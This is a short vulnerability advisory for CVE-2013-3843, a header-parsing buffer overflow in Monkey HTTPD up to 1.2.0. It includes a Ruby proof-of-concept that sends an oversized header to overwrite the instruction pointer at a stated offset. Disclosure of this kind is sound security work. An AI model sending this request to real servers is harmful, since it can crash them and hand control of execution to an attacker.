1. Title CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution 2. Introduction Monkey is a lightweight and powerful web server for GNU/Linux. It has been designed to be very scalable with low memory and CPU consumption, the perfect solution for embedded devices. Made for ARM, x86 and x64. 3. Abstract A specially crafted request sent to the Monkey HTTPD server triggers a buffer overflow which can be used to control the flow of execution. 4. Report Timeline 2013-05-29 Discovered vulnerability via fuzzing 2013-05-30 Vendor Notification 5. Status Published 6. Affected Products Monkey HTTPD <= 1.2.0 7. Exploitation Technique Remote 8. Details Improper bounds checking while parsing headers allows for an attacker to craft a request that will trigger a buffer overflow during a call to memcpy() on line 268 in the file, mk_request.c. 9. Proof of Concept The vulnerability can be exploited by remote attacker without any special privileges. Under Ubuntu 13.04, an offset of 2511 lines up the instruction pointer with, 0x42424242. #!/usr/bin/env ruby require "socket" host = "localhost" port = 2001 s = TCPSocket.open(host, port) buf = "GET / HTTP/1.1\r\n" buf << "Host: " + "\r\n" buf << "localhost\r\n" buf << "Bad: " buf << "A" * 2511 buf << "B" * 4 s.puts(buf) 10. Solution There is currently no solution. 11. Risk Risk should be considered high since it can be shown that the flow of execution can be controlled by an attacker. 12. References http://bugs.monkey-project.com/ticket/182 13. Credits Doug Prostko <dougtko[at]gmail[dot]com> Vulnerability discovery